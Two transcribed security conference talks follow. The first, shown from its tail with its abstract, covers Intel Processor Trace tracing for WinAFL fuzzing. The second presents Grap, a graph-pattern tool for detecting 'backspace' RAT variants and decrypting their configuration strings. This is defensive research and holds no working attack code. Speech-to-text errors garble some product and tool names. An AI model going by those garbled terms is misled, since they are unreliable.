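        prev_loc = cur_loc >> 1         # shift so A->B and B->A hash differently

    record_block(0x4A13)
    record_block(0x91C7)
    print(sum(1 for b in trace_bits if b))   # distinct edge buckets hit: 2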
So, these loaders like PIN or Dynamo Rio, they have to disassemble your program to instrument them. So, he was able to, and I did some experimentation on trying to do forking in Windows previous talks, and it turns out it's just real pain. So, using persistent mode, you get things like, you don't have to worry about ASLR because you're not exiting the process, and you don't have to re-disassemble the process every time because you're using that code cache. So, Win AFL turned out to be pretty well engineered. And basically, you can tell it how many iterations to persist, like, you know, maybe do a thousand iterations, and then go ahead and exit and restart the process so that we can, if we have any memory leaks or we're not quite cleaning up properly, we can just handle that through delaying the restart. Now, persistence is key because every time you load this in the DBI, it's going to disassemble it. So, if we were to just do it every time, we'd get two executions a second on this GDI plus demo I'm going to show you. If we persisted 100 times before we restarted 72 executions a second and so on, it reaches its ceiling somewhere around a thousand or so iterations. So, we have now integrated our Intel PT driver into Win AFL as an alternative tracer engine. And now, this brings some problems because the reason I had him show you the text version of that dump was that we don't have all the addresses in the log file. So, we have to recover some of those along the way. We don't have persistence mode working quite yet, unfortunately. I have done some experimentation here. It's around the corner. By the next time we present it to Hack in the Box, this will be available. I'm building my tooling on top of Alex Inescu's great work from last year at Recon on the application verifier hooking system. And so, basically, as it is, I'm using the IP filtering mode so you can specify up to four DLLs that you want to trace or, you know, four modules or any address ranges in your process that you want to trace and so on. The current status now is that we do accurately decode the full trace, so doing disassembly online and using cache for the control filigree that you recover. So, I first looked to see if we've already resolved what this upcoming conditional branch is. And if so, then it's a quick index. If not, I have to disassemble forward to determine the targets for the conditional branch and then store those in a structure. The edge and source destination are recorded as expected, so we're not reduced to basic blocks. We actually do get the edges. And I'm currently just using create process, so we're doing this iteratively rather than forking or persistence mode yet. So, in order to determine the performance of this tracing mechanism, I first made a dummy looping benchmark. So, basically, it was just creating the process and waiting for it to exit. So, we get our kind of maximum bounds on how many iterations we'll be able to execute with a sample. In this case, I found that we could get 85 executions a second without doing any tracing. We're just generating the fuzzer input and running it without anything like that. We're not parsing the log file. We're not doing anything. So, once we enable the tracing, that was reduced to 72 executions a second, which is right in that sweet zone of 15% overhead that Intel was promising for this particular sample. So, parsing the log file was an additional 22% overhead. So, now we're down to 55 executions a second. And I'll demo what this all means for you here. 
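Before the comparison, a quick sanity check on how those percentages compose — the numbers below simply replay the figures just quoted:

    baseline = 85.0                         # exec/s with no tracing at all
    with_trace = baseline * (1 - 0.15)      # ~15% hardware tracing overhead
    with_decode = with_trace * (1 - 0.22)   # ~22% more for parsing the log
    print(round(with_trace), round(with_decode))   # ~72 and ~56 exec/s,
                                                   # close to the 72 and 55 quoted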
So, we'll compare it to the... I'm going to show you... So, we're going to fuzz GDI plus. This is an experiment that comes with the Win AFL out the gate. You just pass it some image files and it uses Windows to render them without rendering to the screen. And this is a live demo of that working. So, currently this is using Dynamo Rio in persistence mode with the maximum number of iterations possible. And we see that it's getting 127 executions a second. The lighting is not good here, unfortunately, but hopefully you guys can see that a little bit. I can increase the font just quickly here. So, what we're looking at here is this number specifically. So, we get 126 executions a second using Dynamo Rio versus GDI. So, let's see how our Windows PC driver performs in comparison. Sorry, that's me decoding the log here. So, let's redirect that out to Noel. Okay, so we're seeing with that overhead of the 15% for tracing and then the additional overhead of 22% for decoding. This will creep up a little bit, but we're only getting about 40 something executions a second. That's a little bit disappointing. We're kind of hoping to see a little bit faster. Now, you have to keep in mind again that this is just iterative tracing. We're not doing in-memory fuzzing. So, once we get to doing in-memory fuzzing, this number will increase significantly. However, this is not the end of the story. I originally was doing all my testing against their setup with the GDI plus wrapper. And as you can see in my command line here, this is tracing only the Windows Codex DLL and the GDI plus DLL in the process. So, I made another demo in order to compare the performance. And this time we'll trace libpng using WinAFL. And so, this is just what libpng statically compiled into a small harness that will just load a png file. It will fuzz it and then it will fix up check sums and then it will parse it through libpng. And we see that the performance becomes quite abysmal, actually. So, this is the Dynamo Rio. That's expected. But we're seeing only 0.5 executions per second. So, this is quite slow, obviously. This is not where we want to be. And this is because since this statically compiled all of the code involved in libpng, including the encryption or compression and things like that, are included here, which causes some issues in the Dynamo Rio backend. Now, here's the fun part. We have a constant overhead when we use Intel PT. So, using Intel PT, we can see that we're back up in that. This will creep up to about 55-60 executions a second. So, instead of being only a half an execution a second, this is 100 times faster than the Dynamo Rio backend. And this is doing the full code coverage tracing, finding new paths, and so on. So, with this engine, we've done 100 times performance increase depending on your target application. And this is not specifically chosen. This was just randomly I had this fuzzer laying around and uses the demo. So, yeah. So, that's my demos for this plugged into 1AFL. Thank you. And so, just closing remarks now. Number one, all the code that we've written is already open source. They're going to be open source. We're on GitHub slash Intel PT. Real simple. The driver is already there. I actually have a pull request from Andrea from last night. So, the latest version is on GitHub. It'll be merged tonight. The 1AFL needs a little cleanup. I was up till 3.30 last night making my final preparation. So, that code will be up next week. And then we just have a few more things that we need to address. 
But obviously, you know, we see that code coverage is being finally harnessed to make our fuzzing better. We can load this information into IDA to do our analysis of crash or malware or whatever it might be. And using the hardware supported tracing engine, we don't have any issues like you would have with other software-based instrumentation and hooking engines. You know, once, you know, one of our future plans is to get this into a hypervisor so that we can trace the guests inside of a hypervisor. And then your, you know, your malware tracing will be basically, you know, unobservable and you won't be able to disable it in that method. There are capabilities of deploying Intel PT to trace things like SGX mode and SMM and BMM. And those are kind of future areas of work. And then also, my end goal is, of course, to get this fully supported with persistent mode and everything as well. One thing that we need to do as part of that is to finish the ETW-based thread context switch awareness, because we need to separate these logs out into a per-thread instance. Otherwise, you have to use the timing information to determine where the synchronization is between the threads, and that slows down the parsing a lot. So our goal is to get the logs individualized before you do your parsing, and so you only have to parse the thread that you care about that's doing your, you know, your file or network I.O. And did you have any further comments, solutions? Just wanted to say that the new version that we are going to release already support the XAVE feature, and if you download it, you can test it directly, and it's quite a cool feature in my opinion. Okay, so you can get this code and you can reach us on Twitter, and thank you very much. Thank you. Hopefully, I think we might have a minute for questions. We're just on time. Yes. Okay, Trace, inside the filter machine. So currently, there are, we, there are any hypervisors that currently expose this and virtualize this. For example, in the other hardware tracing modes, the hypervisor has to virtualize the support for writing those MSRs. This does exist, like, for example, in VMware using the BTS mechanism, but Intel PT is rather new, so there aren't any hypervisors that are available yet. So we are either going to have to modify Zen or KBM, and we've been actually even just today talking about perhaps being able to trace the entirety of the hypervisor and then later on pull out only the user mode processor kernel threads that you're interested in. So currently, no, but absolutely, we'll continue working on this until we get there. Thanks. Yeah, and I know that that will hopefully be applicable for cuckoo sandbox, so. Were there any other questions? Okay, feel free to grab us. Thank you very much for your attention.
|
This talk will explore Intel Processor Trace, the new hardware branch tracing feature included in Intel Skylake processors. We will explain the design of Intel Processor Trace and detail how the current-generation implementation works, including the various filtering modes and output configurations. This year we designed and developed the first open-source Intel PT driver for the Microsoft Windows operating system. We will discuss the architecture of the driver and the large number of low-level programming hurdles we had to overcome throughout its development to program the PMU, including registering Performance Monitoring Interrupts (PMI), locating the Local Vector Table (LVT), and managing physical memory. We will also introduce the new features of the latest version, such as IP filtering and multi-processor support. We will demonstrate the usage of Intel PT in Windows environments for diagnostic and debugging purposes, showing a “tracing” demo and our new IDA plugin, which is able to decode the trace data and apply it directly to the visual assembly graph. Finally, we discuss how we have harnessed this branch tracing engine for guided fuzzing. We have added the Intel PT tracing mode as an engine for targeting Windows binaries in the widely used evolutionary fuzzer American Fuzzy Lop. This fuzzer uses random mutation fuzzing with a code-coverage feedback loop to explore new areas. Using our new Intel PT driver for Windows, we provide the fastest hardware-supported engine for targeting binaries with evolutionary fuzzing. In addition, we have added new functionality to AFL for guided fuzzing, which allows users to specify areas of interest on a program's control flow graph. This can be combined with static analysis results or known-vulnerable locations to help automate the creation of trigger inputs that reproduce a vulnerability without the limits of symbolic execution. To keep performance the highest priority, we have also created new methods for encoding weighted graphs into an efficiently comparable bytemap.
|
10.5446/32387 (DOI)
|
OK, so we're going to talk about pattern matching — pattern matching within binaries — and the patterns that we're going to define are graphs. So we will see how we can write patterns as graphs and match them within binaries. Just a quick word about ourselves. I am Aurélien Thierry, I'm a malware analyst at Airbus. And I'm Jonathan Thule, I'm also a malware analyst, but at Stormshield. Throughout our presentation we will talk about a malware sample called backspace; actually it's more like a malware family. It was first seen in 2015, and it's a RAT. What we find in backspace is a small decryption function that will decrypt encrypted configuration variables, such as C&C servers, ports, or registry entries. What we see is that the decryption function is quite simple; it's a small routine. Here we can see it on the left: you simply have a loop with a XOR, which has 11 as its argument, followed by a sub that has 25 as its argument. In the backspace family we find many variants of this decryption routine. So with this kind of family, what we want to do is first detection, so to detect the malware, then to classify the variants based on the decryption algorithm that is used, and then to be able to decrypt the configuration variables, since we know which algorithm is being used. One thing you can use to do that is YARA. YARA works on bytes, so you will write regular expressions on bytes, and it will look like the following expression. In order to detect the XOR and then the sub, you will say: okay, I need the byte 80, then any byte, then the byte 11, which is the argument of the XOR, then the byte 80, then any byte, then the byte 25, which is the argument of the sub. But this way of writing a matching signature is not really easy to read. So what we wanted to do with Grapp was to have signatures that are based on the instructions that are within the binary and how they are linked to each other. The kind of signature that we want to write is to say, for this sample: okay, find me a XOR that has 11 as its second argument and that is directly followed by a sub that has 25 as its second argument. I'll present a quick overview of the Grapp project. Since we're working on graphs, we use the dot language to represent the graphs. That is a simple text format — we will see a lot of examples later — and it's quite simple to write the graphs in this language. Grapp is, at the same time, a standalone tool that you can use on the command line; it has Python bindings to leverage the algorithms of Grapp from Python, and we also developed an IDA plugin. Everything is open source and available online. Grapp has two main components. The first one is a disassembler that will take binaries and give you a dot file that is a graph representing the binary. It's coded in Python and it's based on Capstone. The other part of Grapp is a graph matching library that can parse dot files and then do the graph matching; this part is coded in C and C++. So a typical workflow for our analysis with Grapp will be to write patterns — that's what we have here, pattern.dot. So you will write a pattern for backspace. Then you want to analyze backspace.exe, so you give it to the disassembler, which will give you backspace.dot, the disassembled binary as a graph.
And then you will give the pattern and the disassembled graph to the graph matching library that will give you matches and extracts the instructions that you are interested in. So backspace is a binary, okay, so it's a sequence of bytes. Those bytes can be interpreted in assembly language. So a sequence of instructions. So we can see the XOR and the subroutine for the decryption. Then we can create the graph, CFG, so the flow of the execution of the instruction. And in the standalone pool, we use recursive function to create this graph. And we are best for the disassembler on Capstone. But for the Ida plugin, we use the Ida engine for the graph. So we can create the graph. At the right we have, sorry, my French word. We have the graph of backspace, okay, at the right. And we want to match the pattern at the left, which is the decryption routine. To do so, we use the usual, we can use the usual algorithm. So at the left we have the pattern. And at the right we have the test graph. And the goal is just to search the first call. So, okay, we found the first call. Then we got to look to the children. There is an ad. So we got to look to the right. We have the XOR. So we got to try the other child. So we have the push. So we got to search for another call. So, okay, we match a call. The same thing we have ahead. So we go to look to the push at the right, the right children. And no. So we tried the other one. Yeah, we matched the ad. So again, there is a call. Yeah, there is a call. Okay. So next and so on. So we found the push. Okay. And so on. So, okay. It's pretty simple, but you need to check every child of the node. And it's pretty slow on big graphs. So since the usual solution is pretty slow on big graphs, we wanted to have a fast resolution. So we wanted to have different algorithms. So one thing we can say about control for graphs is that there are not any graphs. So the first property they have is that usually when you will disassemble them, you will see that a node in the control for graph has at most two children. It happens when you have, for instance, sorry, a conditional jump. You have one child that will be reached when the condition is fulfilled and one child that will be reached when the condition is not fulfilled. So that's the first property we have on control for graphs. Another property is that the children are not symmetrical. Usually you will find that one of the child is directly the following instruction as the next address. And the other child is a remote instruction somewhere else in the program. So we cannot invert them. So we will force that in our graphs, you cannot invert the order of children. So what you need to see now is that once we say that children are ordered in your graphs, the objects we are manipulating are not really graphs anymore and that will help us have a very fast matching. The other thing we can say about patterns. So I talked about control for graphs in general, but patterns are specific. As we saw earlier, it's easier to match them from their first node. So we will force that every pattern has a first node. So the first node, it's a root node that's, that from this node, every other node of the graph can be reached. So on the example on the right, that is our pattern for back space, you have the first node on the top, which is a root node because from it you can reach every other node. Okay. So with this restriction, we will have fast matching. I'll explain why. So this slide will show you how we can represent a pattern on a different form. 
So the pattern we have now are what we see on the left. So we have a call and add, compare, then a push and a push and the children are ordered. We have child number one and child number two and child number one is here. So there is, with this kind of thing, since we have a root node, which is a call, there is a unique way to number this graph with a depth first search. So that is the following. I take the root node. So this is a call. I number this one one. Then I take the first child of the call. I get here to the add. I number it two. Then I take the first child and number it three. Then I go back to the call. I will go to the child number two, number it four and go to the child number one, number it five. So I can describe it on a text way as this. So it's equivalent to the pattern. And that means, okay, I'm looking for a pattern for a graph which has as a first node a call. Then it has a first child. If you take it, you get to an add. Then I take again the first child. If you take it, you get to a compare. Then you go back to the first, to the node number one, which was a call. So you go back here and you say, okay, now you take the child number two and you get to a push. Then you take the child number one and you get to another push. So this representation as a text, well, this text representation is equivalent to the pattern representation as a graph. So once you have this, the question we need to ask is can we perform the traversal of the pattern within the test graph? So we saw that the pattern on the left is equivalent to the text representation. I add some color because it's nice service color. Yes, it is. Okay. So now it's easier. I need to find, the first thing I need to do is to find a root node that would be a call. So I have a candidate on the right here, which is this one. Then I get to the add part. So I need to see here if there is a node, a child number one, that would be an add. So I take the child number one here, I get to a XOR, so it doesn't match. I have to go back. So I have to find another root node that could be a call. So there is one here. Now I ask, is there a child number one that is an add? Yes. I will number this one too, so I get there. Is there a child number one that is a compare? Yes, it works. Then, okay, take me back to the child number, to the node number one, so back to the call. So I get there. I ask, is there a child number two that is a push? It works. I say, is there a child number one that is a push? It also works. So this gives us a matching for the pattern, from the pattern to the test graph. So that is the algorithm that we will use. So the difference with the previous algorithm is that now that children are ordered, we saw that we know that we're looking for child number one or child number two. So you don't have the exponential factor anymore. You will only have the polynomial time for matching, so it's much faster. Okay, so I will stop with the algorithms now. I will go back to the patterns. So I talked about how we can match them, but now I will say what are our patterns, how do they look like? So on the left you have our pattern for backspace, which was a decryption routine. And so we said that patterns are dot files with specific fields because we will use conditions and opcodes on arguments, on the address of the instruction, and so on. So on the right here you have an example of a pattern for backspace that matches exactly the two instructions, XOR and sub. 
So what it says here, so it's a dot file, it says a dot keyword, then we have the name of the pattern, so it's decrypt with XOR and a sub. Then we say it has nodes, it has two nodes. The first node is A. With the condition and the node is okay, I want to match an instruction that has XOR as its opcode and has as argument number two, 11. I have another node that is B, and the condition is I want to match an opcode that is sub, and that has argument number two, 25. And then the part here specifies the edges, so there is an edge from node A to node B, so it means I have a child from the base that is node B. Okay, a few more things about node options and edge options in our pattern language. So I said that pattern graphs are supposed to have a root node, that is a node from which you can reach every other node. So in order to specify this node, you can say at the option root is true, that means this node is a root. You have the code field that says specify the condition, so we can have a condition on opcodes, for instance. We have the get ID flag. Get ID means it will tell graph, okay, when you find the match for this node, I'm interested in this match, so I want you to print it or I want you to keep it aside so I can access it later. Okay, so that's for node options, for edge options, sorry, we saw that childs are numbered, either one or two, so we have an option to specify on an edge if it's a child number one or a child number two. So the example below is the same pattern as previously, but with every option explicitly. So we have still the condition. We have, okay, this node is a root, so that's the first node of the pattern. We're interested in this node, and I want you to mark the node with A, so that's the name of the node. For the node B, I'm interested also in the node, so you have to mark it B. And the child number of the edge was one because they are following each other. There are sequential instructions. Okay, so back on conditions. Conditions, we will be able to make conditions on instructions, and there will be conditions on the full string of the instructions, like move EAX something, for instance. We will have conditions on the address, conditions on the opcode, on the arguments, on the number of arguments, and the text of the arguments, so these are string fields. We will also have conditions on the number of incoming and the number of outgoing edges. Sorry. So that means the number of fathers and the number of children of a node. I have an example here that says I'm looking for a function that is frequently called, so that there is a call to this node. So the call is a node A, and the instruction being called is B. And then there is an edge between A and B. So the number of the edges, too, because it's not a following instruction, it is a remote instruction. And the condition we have on node B is that it has multiple incoming nodes, so that will help us find functions that are frequently called in the code. Okay, so until now, I explain how we can match one node to one instruction. But what we will want to do next is to match one node to multiple instructions. Like when you want to match basic blocks, sometimes you don't care how many instructions there is in the basic block, you want to match, say, okay, this node needs to match a whole basic block. So we can specify a minimum number of matches for a node on a maximum number of matches. It only works on sequential instructions within basic blocks, so these are instructions that have one father and one child. 
So it looks like that. If you have a basic block that we see here in Ida, so there are two incoming nodes, two outgoing nodes, and only three instructions here. To match these kind of things in Grapp, you just have to say, okay, I want you to match any instructions, that's what it means, called is true. And I need you to match one or more instructions or repeat is plus. If I want to match three push instructions, I will write something like that, like the, I want instructions with the opcode push, and I want them to be repeated three times. So by default, Grapp will take the most matching instructions when you specify repetitions, but you have an option to change that. You can say lazy repeat is true. So the first point was greedy repeat, like you take the most of them with lazy repeat, you will stop once the next condition is fulfilled. I'll give an example here. So back to backspace sample, we had a decryption loop. So we're interested, especially in the XOR and the sub instructions, but we can say, okay, I want a loop that looks a bit like that. So I will want to match one to five instructions. We have three here, but maybe there is less, maybe there is more. Then we have the XOR, then we have the sub, then we have again one to five instructions, then we have a conditional jump that loops back to the beginning of the loop. So the pattern would look like that. We will have here, that's a dot representation on graphs. One to five instructions, then XOR, the sub, one to five instructions, then the conditional jump. In Grapp, it will, well, the pattern would look like that. We will say, okay, I'm looking for any instruction repeated at max five times, and I want you to stop once the next condition is fulfilled. So it will match for this node A, it will match move, add move, then here it will stop because the next condition on B is fulfilled because we have XOR. Then B will match XOR, C will match sub, D will match again many instructions. So ink, compare, move, and it will stop on the last one because the last one, it says that it wants instruction to begin with J and to have two children, so that's the case with the conditional jump here. Okay, so back to our backspace samples. So I'm going to do a demo. We have a hundred backspace samples. I want to disassemble them, and then I want to detect the decryption algorithm that I saw that is the one we reversed in AIDA. Then I want to find variants of this decryption algorithm, and finally I will need to detect all the decryption algorithms. So demo time. Okay, so I have my samples here, so a hundred samples of backspace, and I have a pattern. So that's the one we saw in the slides. So we have a lazy repeat, we have refined XOR here, then the sub. I want to match it against the sample we know. So I have graph to match it against sample this one, so that's the one we worked on. So first it will disassemble the binary, then it learns the pattern, so there is one pattern that was learned. The test graph, which is the sample has 8,000 nodes, and it found one matching here. So the matching is described here. So we have the instruction that matched. We see the XOR and the sub that we were looking for. Okay, so that was for one sample. I want to do it on every sample of backspace to see what happens. Okay, so it will take a while because it needs to disassemble 99 samples, it takes around 20 seconds. 
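As a side note before the demo: the ordered-children traversal described a few slides back boils down to something like this minimal Python sketch over toy dictionaries — an illustration only, not Grapp's actual C++ matcher.

    # Each node maps to (condition, {child_number: child_node}).
    # A "*" condition matches any opcode; otherwise it must equal the opcode.

    def match_from(pattern, graph, p, g):
        p_cond, p_children = pattern[p]
        g_opcode, g_children = graph[g]
        if p_cond != "*" and p_cond != g_opcode:
            return None
        binding = {p: g}
        for number, p_child in p_children.items():
            g_child = g_children.get(number)    # child 1 or child 2 must exist
            if g_child is None:
                return None
            sub = match_from(pattern, graph, p_child, g_child)
            if sub is None:
                return None
            binding.update(sub)
        return binding

    # Pattern: a xor whose first child is a sub.  Test graph: mov -> xor -> sub -> jnz.
    pattern = {"A": ("xor", {1: "B"}), "B": ("sub", {})}
    graph = {0: ("mov", {1: 1}), 1: ("xor", {1: 2}), 2: ("sub", {1: 3}), 3: ("jnz", {})}

    # The pattern's root node is tried against every node of the test graph.
    print([match_from(pattern, graph, "A", n) for n in graph])
    # -> [None, {'A': 1, 'B': 2}, None, None]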
So what we will see is a lot of matching and a lot of text, and then I will show you another option to have less variables output and a more quite one with one sample pair line. So that's what I say, we have a lot of text. So now I will ask it to do it quietly. So it will be much quicker because we don't have to disassemble the files again. I'll show you that. If I show the folder, now we have the.files which are disassembled versions of the binaries. Okay, so now I will launch it again with the quite option. So here I see all the pattern that all the binaries that matched or pattern, but I don't see the one that didn't match. So we find a lot of samples that use the same decryption algorithm, exactly the same, but maybe there are more. So I will ask Grapp to show me all the binaries. So okay, we see that some samples match and some of those didn't match. So what I wanted to do next was to find variants. To find variants, I went back to IDA, which is here. Okay, so here we have the decryption algorithm. I will see how it is called. So what we see is that it's very simple. You have a first basic block, then a loop, then another basic block. And we'll see how it is called. So there is a function here that has a lot of calls to the decryption algorithm. It's always two pushes because there are other arguments, then a call to the decryption function. So I wanted to write a pattern to see and to detect this. So what I did was this pattern. So I asked that we find something with two pushes, then a call, then again two pushes, another call, four times. And they all point to a function that has a first basic block, then a loop, then an end basic block, then a return instruction. And what I say here is that I'm only interested in getting the loop. So I said get ID, I said get ID only on the loop node. So I'll show you how it looks like with that. And I have a colored version because it's always better with colors. Okay, so we have here two pushes, then a call, then two pushes, another call. They all point to the same function. And we're interested in the loop here, which is where the decryption algorithm happens. Okay, so now I need to match this against my samples. Okay, so I find here the first decryption algorithm that we already know is XOR 11 and 25, again the same. Here we have another one. There is a sub. Then XOR with another constant. Then another sub. And there is again the same one. Then, well, we will find that there are many more. I won't show you them all, but what we did next was write a pattern for this decryption variance. So we have, there are very small patterns. So the first one is the one we knew, so 11 and 25. This one is the one we just saw, the B and 12. And there were like five other ones that I won't detail. So what we do now is we want to match them against the backspace samples. So what we see here is that a lot more samples matched, and we know which algorithm was used. So here the pattern that matched was XOR sub. Here it was a sub XOR sub. Here there is another one, another one, etc. So one more thing we wanted to know is that we still have some unmatched binaries. So I want to know why they don't match. One simple thing we did, not really in this order, but it works. We asked for section names. We see that it's UPX, so some samples seem to be packed with UPX. So what I do is I wanted to have a quick signature for these UPX files. So I will look for basic block loops. That means basic blocks that loop to themselves. So I have a pattern for that that I will use now. 
So I find two basic block loops. I didn't really look into what they're doing, but I wanted to use them as signatures. So I wrote a UPX signature which contains these two loops. UPX loop one and UPX loop two. So what I did next was to match them. Okay, so there seems to be more samples that are packed with UPX and I always match the two loops. So I know how to detect variance of backspace. I know how to detect files packed with UPX. So I want to detect them both. So I will combine the two signatures. And I will match them. Okay, it's better. So we still have a few un-matched binaries, but most of them we see that they are either a variant of backspace and we know which algorithm is used or they are packed with UPX. Okay, back to the slides. So what we saw is that we found seven variants of UPX. So there was the first one with Zoro 11 and Sub 25. There was another one that we saw, then five other patterns. We also found out that some binaries are packed with UPX and we wrote a quick signature for these files. We matched them. So what we did is on all 100 backspace samples, it took around 20 seconds to disassemble them. Then to do the matching of nine patterns, it took a little more than two seconds. And in the end, we see that there are like 17 files that are packed with UPX. The half of the samples that have the first pattern that we looked at and the other patterns are used sometimes. And in the end, there was still 11 binaries that we did not identify correctly. So okay, to simplify the creation of scripts, we create Python bindings of the C++ library with Swig. And now with Python, we can disassemble, we can load patterns and test graphs. We can load pattern graphs and test graphs. We can match patterns and parse all the results. So here we have some examples of Python scripts. So at the beginning, we have the import of a library. Then we have the, we load the pattern.file. We extract the graph from the binaries. We still assemble file. Then we load the test graph and after we match the graph, the pattern in the test graph. So here is an example of a pattern. We want to match three pushes. So we use the match graph. And now we can get all matching patterns. Then we can select the pushes patterns. And now we can, with these pushes patterns, we can get all matching instructions. Then we can say, okay, I want to get the IDP. So it gives all instruction with the get IDP. And then we select the first instructions. So now we have the instructions. So we can request some information like the addresses, all the old instruction strings, the opcode, the arguments, and so on. So okay, we can match the decryption loop. And we saw that we have a lot of pushes and call to the decryption strings. So we want to match the two pushes and the call to the decryption routine. Okay? So we have, we want to check, match the first pushes, which is the length, then the encrypted string, and then the call to the entry point of the function to decryp, both strings. So we have the decryption entry point. We can match the address of the, all the decryption loop. So we have the address of the match. Ah, damn it. Okay. So to get the entry point, we know that the function is very slow, very tiny. So we can say, and we know also that the decryption entry point is before the decryption loop. Okay? So we can say, we want to search a node between the decryption address and between the decryption address minus 30. Okay? And we want to match a node with at least five or more incoming. So a little demo. 
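For readers following along without the slides, the script being described looks roughly like the sketch below. The pygrap function and attribute names are approximations of what is narrated here, so treat the exact identifiers as placeholders rather than the released API; the decryption helper simply re-applies the XOR 0x11 / SUB 0x25 loop found above.

    # Names below approximate the talk's narration and may not match the
    # released pygrap bindings exactly -- placeholders only.
    import pygrap

    pattern = pygrap.getGraphFromFile("decrypt_xor_sub.dot")   # pattern graph
    sample = pygrap.getGraphFromFile("backspace.dot")          # disassembled binary
    matches = pygrap.match_graph(pattern, sample)

    def decrypt(blob):
        # The matched variant: XOR 0x11 then SUB 0x25 applied to every byte.
        return bytes(((b ^ 0x11) - 0x25) & 0xFF for b in blob)

    for match in matches:
        insn = match["A"][0]          # instruction bound to the getid node "A"
        print(hex(insn.address), insn.inst_str)
        # From that address the script then looks up to 0x30 bytes back for the
        # routine's entry point (a node with five or more incoming edges), walks
        # the push/push/call sites, and runs each pushed string through decrypt().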
And so the script is here. We have the import. Then we get the binaries. We create the graphs. Then we have those patterns to match the entry point. Then to match the pushes before the call of the decryption function. And we implement the whole variance of the decryption algorithm. So here you have sub-xor, sub-add, and so on. Ah, damn it. So, maybe have it in my log. Okay. So we got to execute the script with a sample. So now we can decrypt those strings. So we have the sample. We match the decrypt-absorbs-sub. Okay? Then we found the address of this routine. Here we match the entry point with the more than five or more than five incoming between the address of the decryption minus 30. Then the address of the decryption. So we found the decryption function. It's the entry point. So now we got to look for the pushes, okay? With the entry point of the function. And then we match 35 calls to this decryption function. And so after this, we take the string, the encrypting string. Then we decrypt it with the algorithm. And now we can see we have some registers and some text files and so on. So now we can do this on all samples. So here we have the first samples with strings, registries. Then we can find some easy on other samples and so on. So there we have all the strings of the configuration and so on of backspace. So okay, we have a tool, but it can be nice to have a plugin tool in IDA to match those patterns. So we have an IDA plugin. We convert the IDA graph to forGrap. Then we can match patterns with PGrap, which is the Python binding. And then we can, with the UI, browse those patches and put some color on it. And then we apply some filters technique. So match a single pattern. For example, for RC4 set key, we have two small loops for the initialization. And if we create just one pattern for those two loops, we have a lot of false positives. So we create some filter techniques. It's quite simple and obvious. So for example, the set key for RC4, we have two loops for the first loop is the first pattern and the second loop is the second pattern. So if we don't have those two loops in the function, it's not all functions. So you can see at the right we have the two patterns. So okay, it's accepted. But if we have just one pattern, it's rejected. We have also the rate techniques. So also quite simple. We have two loops. But if we have more than two loops in the function, so if we match, for example, three times the pattern one, the function is rejected too. Because we just want the first loop one time and the second loop one time too. Then we have the threshold. So sometime with the pattern, we can have some errors. So at the right, we have four patterns for one function. So we match all patterns. So okay, it's good. But in the middle, the pattern number four, sorry, are not here. So the function is also, for example, the function of decryption. But we missed some patterns. So we create a threshold. So here we have a threshold of 0.75. That means that at least we want three out of four patterns. So in the middle, it's accepted two. But at the left, we just have two out of four. So we reject this function. The last one is the overlapping. So in, for example, again, the offset key, we have the two loops. We create one pattern for the first and another for the second. And if we match the same loop with those two patterns, that means we match the same loop and we don't want this. But in the example at the left, we have two matches of the first pattern and one of the second. 
There is a overlapping between the first and the second. So if we remove the pattern number one for the overlapping, we have valid matches at the right. So we can say, okay, it's all function. This technique is not yet implemented in either graph. So the creation of a rule for the plugin is quite simple too. So for the RC4 set key, we create the first loop. So loop one, we give the path to the dot find, to the pattern. Then we give a name, a description of this pattern. Then we say, okay, a minimum pattern is one. So that means I want to match one time this pattern or more. Then we fix the max pattern. So we say, I want at max one time this pattern. So we must match just one time the first loop. We do the same things for the second loop. Then we create the function patterns. So we give the two loops because we must match those two loops in the function set key of RC4. Then we put the threshold that here is one. So it means we must get the two patterns to validate the function. Then a name, a description, and blah, blah, blah. So demo. Okay. So we get a load of the plugin. So the fingerprint is to find the patterns. So, okay, we launched. Here we can see we have matched some patterns. So we can click on it. And then we have the description routine. Okay. But sometimes we don't know really where are the matched. So we put some color in it. So here, beam. Okay. And then we have the color on the two instruction for the decryption loop. And we have some color on the entry point. So, yep. Here we have, okay, is the pushes for the strings. And if we, I don't know, we renamed it. Okay. Then we launch again the scan. Here we have the name of the function also with the number of instruction and so on. Okay. RC4, the match are not efficient because the loops are very small and very generic. So we still have many false positives, but we have few false negatives, which is cool. So the tooling is appropriate. Okay. And we can try maybe to create other signatures for other cryptographic algorithm, packers and so on. And maybe we can put the filtering techniques in P-Grap because it's only in IdaGrap. So the perspective, some limitation of our tools, all the arguments, instruction, opcode and so on are in our strings. So sometimes we have to do some dirty hack to get, for example, the conditional jump. So we want to match an instruction, strings, that begin with J, okay. And we want the node to have two children because in the graph, the instruction with children are calls and conditional jumps. So we are lucky calls begin with C. So, okay. And we have other problem because in the standalone tool, we use the capstone engine and in Ida, we use the Ida engine. So sometimes with, for example, the variables we have in Ida 25H for the exodysmode value 25. And in capstone, we have 0x25. So again, dirty hack to catch both cases. So R2, we catch 25 or 0x25. So the solution is semantics. The idea behind that is to say, okay, I want to check if my argument one is a register or I want to check if the opcode is conditional jumps and so on. The same things for the, for R1 if we want to catch an integer, an integer with the value 25. But maybe in graph V2, okay. Okay. There is another limitation of the, how we write patterns. That is, that we can, we explain how we can do node repetition. But there is one limitation that is the following. We can either, with node repetition, we can either say I want the least number of matched instructions or I want the maximum number of matched instructions. There is no in-between. 
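Stepping back for a moment, the accept/reject rules just described — minimum and maximum match counts per sub-pattern, plus a threshold on how many sub-patterns must be satisfied — boil down to a few lines of logic. A minimal sketch, separate from the plugin's actual rule format:

```python
# Sketch of the filter logic: each sub-pattern has a min/max count inside one
# function, and the rule has a threshold on the fraction of sub-patterns that
# must be satisfied (1.0 = all of them, 0.75 = three out of four, ...).

def evaluate_rule(match_counts, rules, threshold):
    """match_counts: {pattern_name: times matched in this function}
       rules:        {pattern_name: (min_count, max_count)}"""
    satisfied = sum(1 for name, (lo, hi) in rules.items()
                    if lo <= match_counts.get(name, 0) <= hi)
    return satisfied / len(rules) >= threshold

# RC4 set_key example: both loops exactly once, threshold 1.0
rc4_setkey = {"loop1": (1, 1), "loop2": (1, 1)}
print(evaluate_rule({"loop1": 1, "loop2": 1}, rc4_setkey, 1.0))  # accepted
print(evaluate_rule({"loop1": 3, "loop2": 1}, rc4_setkey, 1.0))  # rejected (rate filter)
print(evaluate_rule({"loop1": 1},             rc4_setkey, 1.0))  # rejected (missing loop)
```

Now, back to that node-repetition limitation with no in-between.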
